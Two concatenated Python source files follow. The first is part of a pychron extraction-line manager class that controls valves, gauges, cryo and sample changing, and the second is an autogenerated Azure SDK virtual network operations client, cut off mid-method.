display_volume = Bool
volume_key = Str
sample_changer = Instance(SampleChanger)
link_valve_actuation_dict = Dict
canvas_path = File
canvas_config_path = File
use_hardware_update = Bool
hardware_update_period = Float
file_listener = None
wait_group = Instance(WaitGroup, ())
console_bgcolor = 'black'
_active = False
_update_status_flag = None
_monitoring_valve_status = False
canvas_editor = Instance(CanvasEditor, ())
logging_level = Enum(LOG_LEVEL_NAMES)
def set_extract_state(self, *args, **kw):
pass
def activate(self):
self._active = True
self._load_additional_canvases()
self._activate_hook()
self.reload_canvas()
devs = self.application.get_services(ICoreDevice)
self.devices = devs
def deactivate(self):
if self.gauge_manager:
self.gauge_manager.stop_scans()
if self.monitor:
self.monitor.stop()
self._active = False
self._deactivate_hook()
def bind_preferences(self):
prefid = 'pychron.extraction_line'
attrs = ('canvas_path', 'canvas_config_path',
'use_hardware_update', 'hardware_update_period',
'check_master_owner', 'use_network', 'logging_level')
for attr in attrs:
try:
bind_preference(self, attr, '{}.{}'.format(prefid, attr))
except BaseException as e:
print('fffffffff', attr, e)
bind_preference(self.network, 'inherit_state', '{}.inherit_state'.format(prefid))
self.console_bind_preferences('{}.console'.format(prefid))
if self.gauge_manager:
bind_preference(self.gauge_manager, 'update_period', '{}.gauge_update_period'.format(prefid))
bind_preference(self.gauge_manager, 'use_update', '{}.use_gauge_update'.format(prefid))
if self.canvas:
bind_preference(self.canvas.canvas2D, 'display_volume', '{}.display_volume'.format(prefid))
bind_preference(self.canvas.canvas2D, 'volume_key', '{}.volume_key'.format(prefid))
def link_valve_actuation(self, name, func, remove=False):
if remove:
try:
del self.link_valve_actuation_dict[name]
except KeyError:
self.debug('could not remove "{}". not in dict {}'.format(name,
','.join(
list(
self.link_valve_actuation_dict.keys()))))
else:
self.debug('adding name="{}", func="{}" to link_valve_actuation_dict'.format(name, func.__name__))
self.link_valve_actuation_dict[name] = func
def enable_auto_reload(self):
self.file_listener = fm = FileListener(path=self.canvas_path,
callback=self.reload_canvas)
def disable_auto_reload(self):
if self.file_listener:
self.file_listener.stop()
def do_sample_loading(self):
"""
1. isolate chamber
2.
:return:
"""
sc = self._sample_changer_factory()
if sc:
if self.confirmation_dialog('Ready to Isolate Chamber'):
self._handle_console_message(('===== Isolate Chamber =====', 'maroon'))
if not sc.isolate_chamber():
return
else:
return
if self.confirmation_dialog('Ready to Evacuate Chamber'):
self._handle_console_message(('===== Evacuate Chamber =====', 'maroon'))
err = sc.check_evacuation()
if err:
name = sc.chamber
msg = 'Are you sure you want to evacuate the {} chamber. {}'.format(name, err)
if not self.confirmation_dialog(msg):
return
if not sc.evacuate_chamber():
return
else:
return
if self.confirmation_dialog('Ready to Finish Sample Change'):
self._handle_console_message(('===== Finish Sample Change =====', 'maroon'))
sc.finish_chamber_change()
def get_volume(self, node_name):
v = 0
if self.use_network:
v = self.network.calculate_volumes(node_name)[0][1]
return v
def test_cryo_communication(self):
self.info('test cryo communication')
ret, err = True, ''
if self.cryo_manager:
if self.cryo_manager.simulation:
ret = globalv.communication_simulation
else:
ret = self.cryo_manager.test_connection()
return ret, err
def test_gauge_communication(self):
self.info('test gauge communication')
ret, err = True, ''
if self.gauge_manager:
if self.gauge_manager.simulation:
ret = globalv.communication_simulation
else:
ret = self.gauge_manager.test_connection()
return ret, err
def test_connection(self):
self.info('test connection')
return self.test_valve_communication()
def test_valve_communication(self):
self.info('test valve communication')
print('asdf', self.switch_manager, hasattr(self.switch_manager, 'get_state_checksum'))
ret, err = True, ''
if self.switch_manager:
if hasattr(self.switch_manager, 'get_state_checksum'):
valves = self.switch_manager.switches
vkeys = sorted(valves.keys())
state = self.switch_manager.get_state_checksum(vkeys)
ret = bool(state)
return ret, err
def setup_status_monitor(self):
self.stop_status_monitor(id(self), block=True)
self.start_status_monitor(id(self))
self.refresh_states()
def stop_status_monitor(self, *args, **kw):
pass
def start_status_monitor(self, *args, **kw):
pass
def refresh_states(self, *args, **kw):
pass
def refresh_canvas(self):
# self.debug('refresh canvas')
for ci in self.canvases:
ci.refresh()
def finish_loading(self):
if self.use_network:
self.network.load(self.canvas_path)
self._set_logger_level(self.switch_manager)
def reload_canvas(self):
self.debug('reload canvas')
self.reload_scene_graph()
if self.use_network:
self.network.load(self.canvas_path)
sm = self.switch_manager
if sm:
sm.refresh_network()
for p in sm.pipette_trackers:
p.load()
for p in sm.pipette_trackers:
self._set_pipette_counts(p.name, p.counts)
self._reload_canvas_hook()
self.refresh_canvas()
def reload_scene_graph(self):
self.info('reloading canvas scene')
for c in self.canvases:
self.canvas_editor.load(c.canvas2D, self.canvas_path)
# c.load_canvas_file(c.config_name)
if self.switch_manager:
c.load_canvas_file(self.canvas_path, self.canvas_config_path, self.switch_manager.valves_path)
for k, v in self.switch_manager.switches.items():
vc = c.get_object(k)
if vc:
vc.soft_lock = v.software_lock
vc.state = v.state
def update_switch_state(self, name, state, *args, **kw):
# self.debug('update switch state {} {} args={} kw={}'.format(name, state, args, kw))
if self.use_network:
self.network.set_valve_state(name, state)
for c in self.canvases:
self.network.set_canvas_states(c, name)
for c in self.canvases:
c.update_switch_state(name, state, *args, **kw)
def update_switch_lock_state(self, *args, **kw):
for c in self.canvases:
c.update_switch_lock_state(*args, **kw)
def update_switch_owned_state(self, *args, **kw):
for c in self.canvases:
c.update_switch_owned_state(*args, **kw)
def set_valve_owner(self, name, owner):
"""
set flag indicating if the valve is owned by a system
"""
if self.switch_manager is not None:
self.switch_manager.set_valve_owner(name, owner)
def show_valve_properties(self, name):
if self.switch_manager is not None:
self.switch_manager.show_valve_properties(name)
def get_software_lock(self, name, **kw):
if self.switch_manager is not None:
return self.switch_manager.get_software_lock(name, **kw)
def set_software_lock(self, name, lock):
if self.switch_manager is not None:
if lock:
self.switch_manager.lock(name)
else:
self.switch_manager.unlock(name)
description = self.switch_manager.get_switch_by_name(name).description
self.info('{} ({}) {}'.format(name, description, 'lock' if lock else 'unlock'),
color='blue' if lock else 'black')
self.update_switch_lock_state(name, lock)
def get_state_checksum(self, vkeys):
if self.switch_manager is not None:
return self.switch_manager.calculate_checksum(vkeys)
def get_valve_owners(self):
if self.switch_manager is not None:
return self.switch_manager.get_owners()
def get_locked(self):
if self.switch_manager is not None:
return self.switch_manager.get_locked()
def get_valve_lock_states(self):
if self.switch_manager is not None:
return self.switch_manager.get_software_locks()
def get_valve_state(self, name=None, description=None):
if self.switch_manager is not None:
if description is not None and description.strip():
return self.switch_manager.get_state_by_description(description)
else:
return self.switch_manager.get_state_by_name(name)
def get_indicator_state(self, name=None, description=None):
if self.switch_manager is not None:
if description is not None and description.strip():
return self.switch_manager.get_indicator_state_by_description(description)
else:
return self.switch_manager.get_indicator_state_by_name(name)
def get_valve_states(self):
if self.switch_manager is not None:
# only query valve states if not already doing a
# hardware_update via _trigger_update
return self.switch_manager.get_states(query=not self.use_hardware_update)
def get_state_word(self):
if self.switch_manager is not None:
# only query valve states if not already doing a
# hardware_update via _trigger_update
return self.switch_manager.get_states(query=not self.use_hardware_update, version=1)
def get_lock_word(self):
if self.switch_manager is not None:
# only query valve states if not already doing a
# hardware_update via _trigger_update
return self.switch_manager.get_software_locks(version=1)
def get_valve_by_name(self, name):
if self.switch_manager is not None:
return self.switch_manager.get_switch_by_name(name)
def get_valve_names(self):
names = []
if self.switch_manager is not None:
names = self.switch_manager.get_valve_names()
return names
def get_pressure(self, controller, name):
if self.gauge_manager:
return self.gauge_manager.get_pressure(controller, name)
def get_device_value(self, dev_name):
dev = self.get_device(dev_name)
if dev is None:
self.unique_warning('No device named {}'.format(dev_name))
else:
return dev.get()
def disable_valve(self, description):
self._enable_valve(description, False)
def enable_valve(self, description):
self._enable_valve(description, True)
def lock_valve(self, name, **kw):
return self._lock_valve(name, True, **kw)
def unlock_valve(self, name, **kw):
return self._lock_valve(name, False, **kw)
def open_valve(self, name, **kw):
return self._open_close_valve(name, 'open', **kw)
def close_valve(self, name, **kw):
return self._open_close_valve(name, 'close', **kw)
def sample(self, name, **kw):
def sample():
valve = self.switch_manager.get_switch_by_name(name)
if valve is not None:
self.info('start sample')
self.open_valve(name, **kw)
time.sleep(valve.sample_period)
self.info('end sample')
self.close_valve(name, **kw)
t = Thread(target=sample)
t.start()
def cycle(self, name, **kw):
def cycle():
valve = self.switch_manager.get_switch_by_name(name)
if valve is not None:
n = valve.cycle_n
period = valve.cycle_period
self.info('start cycle n={} period={}'.format(n, period))
for i in range(n):
self.info('valve cycling iteration ={}'.format(i + 1))
self.open_valve(name, **kw)
time.sleep(period)
self.close_valve(name, **kw)
time.sleep(period)
t = Thread(target=cycle)
t.start()
def get_script_state(self, key):
return self.pyscript_editor.get_script_state(key)
def set_selected_explanation_item(self, obj):
if self.explanation:
selected = None
if obj:
selected = next((i for i in self.explanation.explanable_items if obj.name == i.name), None)
self.explanation.selected = selected
def new_canvas(self, config=None):
c = ExtractionLineCanvas(manager=self,
display_name='Extraction Line')
c.load_canvas_file(canvas_config_path=config)
self.canvases.append(c)
c.canvas2D.trait_set(display_volume=self.display_volume,
volume_key=self.volume_key)
if self.switch_manager:
self.switch_manager.load_valve_states()
self.switch_manager.load_valve_lock_states(force=True)
self.switch_manager.load_valve_owners()
c.refresh()
return c
def get_wait_control(self):
wd = self.wait_group.active_control
if wd.is_active():
wd = self.wait_group.add_control()
return wd
def set_cryo(self, v, v2=None):
self.debug('setting cryo to {}, {}'.format(v, v2))
if self.cryo_manager:
return self.cryo_manager.set_setpoint(v, v2)
else:
self.warning('cryo manager not available')
return 0, 0
def get_cryo_temp(self, iput):
self.debug('get cryo temp {}'.format(iput))
if self.cryo_manager:
return self.cryo_manager.read_input(iput)
else:
self.warning('cryo manager not available')
return 0
def set_experiment_type(self, v):
self.debug('setting experiment type={}'.format(v))
if self.cryo_manager:
self.cryo_manager.species = v
# ===============================================================================
# private
# ===============================================================================
def _load_additional_canvases(self):
for ci in self.plugin_canvases:
c = ExtractionLineCanvas(manager=self,
display_name=ci['display_name'], )
c.load_canvas_file(ci['canvas_path'], ci['config_path'], ci['valve_path'])
self.canvases.append(c)
def _activate_hook(self):
self.monitor = SystemMonitor(manager=self, name='system_monitor')
self.monitor.monitor()
if self.gauge_manager:
self.info('start gauge scans')
self.gauge_manager.start_scans()
if self.switch_manager and self.use_hardware_update:
do_after(1000, self._update)
def _update(self):
if self.use_hardware_update and self._active:
self.switch_manager.load_hardware_states()
self.switch_manager.load_valve_owners()
do_after(self.hardware_update_period * 1000, self._update)
def _deactivate_hook(self):
pass
def _reload_canvas_hook(self):
pass
def _log_spec_event(self, name, action):
sm = self.application.get_service('pychron.spectrometer.scan_manager.ScanManager')
if sm:
color = 0x98FF98 if action == 'open' else 0xFF9A9A
sm.add_spec_event_marker('{} ({})'.format(name, action),
mode='valve',
extra=name,
bgcolor=color)
def _enable_valve(self, description, state):
if self.switch_manager:
valve = self.switch_manager.get_valve_by_description(description)
if valve is None:
valve = self.switch_manager.get_switch_by_name(description)
if valve is not None:
if not state:
self.close_valve(valve.name)
valve.enabled = state
def _lock_valve(self, name, action, description=None, address=None, **kw):
"""
:param name:
:param action: bool True ==lock false ==unlock
:param description:
:param kw:
:return:
"""
vm = self.switch_manager
if vm is not None:
oname = name
if address:
name = vm.get_name_by_address(address)
if description and description != NULL_STR:
name = vm.get_name_by_description(description, name=name)
if not name:
self.warning('Invalid valve name={}, description={}'.format(oname, description))
return False
v = vm.get_switch_by_name(name)
if action:
v.lock()
else:
v.unlock()
self.update_switch_lock_state(name, action)
self.refresh_canvas()
return True
def _open_close_valve(self, name, action, description=None, address=None, mode='remote', **kw):
vm = self.switch_manager
if vm is not None:
oname = name
if address:
name = vm.get_name_by_address(address)
if description and description != NULL_STR:
name = vm.get_name_by_description(description, name)
# check if specified valve is in the valves.xml file
if not name:
self.warning('Invalid valve name={}, description={}'.format(oname, description))
return False, False
result = self._change_switch_state(name, mode, action, **kw)
self.debug('open_close_valve, mode={} result={}'.format(mode, result))
if mode == 'script':
invoke_in_main_thread(self.refresh_canvas)
if result:
if all(result):
valve = vm.get_switch_by_name(name)
description = valve.description
self._log_spec_event(name, action)
self.info('{:<6s} {} ({})'.format(action.upper(), valve.name, description),
color='red' if action == 'close' else 'green')
vm.actuate_children(name, action, mode)
ld = self.link_valve_actuation_dict
if ld:
try:
func = ld[name]
func(name, action)
except KeyError:
self.debug('name="{}" not in '
'link_valve_actuation_dict. keys={}'.format(name, ','.join(list(ld.keys()))))
return result
def _change_switch_state(self, name, mode, action, sender_address=None, **kw):
result, change = False, False
if self._check_ownership(name, sender_address):
func = getattr(self.switch_manager, '{}_by_name'.format(action))
ret = func(name, mode=mode, **kw)
self.debug('change switch state name={} action={} ret={}'.format(name, action, ret))
if ret:
result, change = ret
if isinstance(result, bool):
if change:
self.update_switch_state(name, True if action == 'open' else False)
return result, change
def _check_ownership(self, name, requestor, force=False):
"""
check if this valve is owned by
another client
if this is not a client but you want it to
respect valve ownership
set check_master_owner=True
"""
ret = True
if force or self.check_master_owner:
if requestor is None:
requestor = gethostbyname(gethostname())
self.debug('checking ownership. requestor={}'.format(requestor))
try:
v = self.switch_manager.switches[name]
ret = not (v.owner and v.owner != requestor)
except KeyError:
pass
return ret
def _set_pipette_counts(self, name, value):
for c in self.canvases:
scene = c.canvas2D.scene
obj = scene.get_item('vlabel_{}Pipette'.format(name))
if obj is not None:
obj.value = int(value)
c.refresh()
def _sample_changer_factory(self):
sc = self.sample_changer
if sc is None:
sc = SampleChanger(manager=self)
if sc.setup():
result = sc.edit_traits(view='chamber_select_view')
if result:
if sc.chamber and sc.chamber != NULL_STR:
self.sample_changer = sc
return sc
def _create_manager(self, klass, manager, params, **kw):
# try a lazy load of the required module
# if 'fusions' in manager:
# package = 'pychron.managers.laser_managers.{}'.format(manager)
# self.laser_manager_id = manager
if 'rpc' in manager:
package = 'pychron.rpc.manager'
else:
package = 'pychron.managers.{}'.format(manager)
if manager in ('switch_manager', 'gauge_manager', 'multiplexer_manager', 'cryo_manager'):
if manager == 'switch_manager':
man = self._switch_manager_factory()
self.switch_manager = man
return man
else:
return getattr(self, manager)
else:
class_factory = self.get_manager_factory(package, klass, warn=False)
if class_factory is None:
package = 'pychron.extraction_line.{}'.format(manager)
class_factory = self.get_manager_factory(package, klass)
if class_factory:
m = class_factory(**params)
self.add_trait(manager, m)
return m
else:
self.debug('could not create manager {}, {},{},{}'.format(klass, manager, params, kw))
def _set_logger_level(self, obj=None):
level = LOG_LEVELS.get(self.logging_level, logging.DEBUG)
getattr(obj, 'logger').setLevel(level)
if hasattr(obj, 'set_logger_level_hook'):
obj.set_logger_level_hook(level)
# ===============================================================================
# handlers
# ===============================================================================
def _logging_level_changed(self, new):
if new:
self._set_logger_level(self)
if self.switch_manager:
self._set_logger_level(self.switch_manager)
@on_trait_change('use_hardware_update')
def _update_use_hardware_update(self):
if self.use_hardware_update:
do_after(1000, self._update)
@on_trait_change('switch_manager:pipette_trackers:counts')
def _update_pipette_counts(self, obj, name, old, new):
self._set_pipette_counts(obj.name, new)
@on_trait_change('use_network,network:inherit_state')
def _update_network(self):
from pychron.canvas.canvas2D.scene.primitives.valves import Valve
if not self.use_network:
for c in self.canvases:
scene = c.canvas2D.scene
for item in scene.get_items():
if not isinstance(item, Valve):
item.active_color = item.default_color
else:
item.active_color = item.oactive_color
else:
net = self.network
if self.switch_manager:
for k, vi in self.switch_manager.switches.items():
net.set_valve_state(k, vi.state)
self.reload_canvas()
@on_trait_change('display_volume,volume_key')
def _update_canvas_inspector(self, name, new):
for c in self.canvases:
c.canvas2D.trait_set(**{name: new})
def _handle_state(self, new):
# self.debug('handle state {}'.format(new))
if isinstance(new, tuple):
self.update_switch_state(*new)
else:
# n = len(new)
for i, ni in enumerate(new):
self.update_switch_state(*ni)
# self.update_switch_state(refresh=i == n - 1, *ni)
def _handle_lock_state(self, new):
self.debug('refresh_lock_state fired. {}'.format(new))
self.update_switch_lock_state(*new)
def _handle_owned_state(self, new):
self.update_switch_owned_state(*new)
def _handle_refresh_canvas(self, new):
# self.debug('refresh_canvas_needed fired')
self.refresh_canvas()
def _handle_console_message(self, new):
color = None
if isinstance(new, tuple):
msg, color = new
else:
msg = new
if color is None:
color = self.console_default_color
if self.console_display:
self.console_display.add_text(msg, color=color)
# ===============================================================================
# defaults
# ===============================================================================
def _cryo_manager_default(self):
from pychron.extraction_line.cryo_manager import CryoManager
return CryoManager(application=self.application)
def _gauge_manager_default(self):
from pychron.extraction_line.gauge_manager import GaugeManager
return GaugeManager(application=self.application)
def _switch_manager_factory(self):
klass = self._get_switch_manager_klass()
vm = klass(application=self.application)
vm.on_trait_change(self._handle_state, 'refresh_state')
vm.on_trait_change(self._handle_lock_state, 'refresh_lock_state')
vm.on_trait_change(self._handle_owned_state, 'refresh_owned_state')
vm.on_trait_change(self._handle_refresh_canvas, 'refresh_canvas_needed')
vm.on_trait_change(self._handle_console_message, 'console_message')
bind_preference(vm, 'valves_path', 'pychron.extraction_line.valves_path')
return vm
def _get_switch_manager_klass(self):
from pychron.extraction_line.switch_manager import SwitchManager
return SwitchManager
def _explanation_default(self):
e = ExtractionLineExplanation()
if self.switch_manager is not None:
e.load(self.switch_manager.switches)
self.switch_manager.on_trait_change(e.refresh, 'refresh_explanation')
return e
def _canvas_default(self):
return self.new_canvas()
def _network_default(self):
return ExtractionLineGraph()
if __name__ == '__main__':
elm = ExtractionLineManager()
elm.bootstrap()
elm.canvas.style = '2D'
elm.configure_traits()
# =================== EOF ================================
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class VirtualNetworksOperations(object):
"""VirtualNetworksOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def _delete_initial(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified virtual network.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualNetwork"
"""Gets the specified virtual network by resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualNetwork, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_06_01.models.VirtualNetwork
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetwork"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualNetwork', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
parameters, # type: "_models.VirtualNetwork"
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualNetwork"
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetwork"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'VirtualNetwork')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualNetwork', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualNetwork', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
parameters, # type: "_models.VirtualNetwork"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.VirtualNetwork"]
"""Creates or updates a virtual network in the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:param parameters: Parameters supplied to the create or update virtual network operation.
:type parameters: ~azure.mgmt.network.v2019_06_01.models.VirtualNetwork
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either VirtualNetwork or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_06_01.models.VirtualNetwork]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetwork"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
virtual_network_name=virtual_network_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('VirtualNetwork', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}'} # type: ignore
def _update_tags_initial(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
parameters, # type: "_models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "_models.VirtualNetwork"
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetwork"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._update_tags_initial.metadata['url'] # type: ignore
path_format_arguments = {
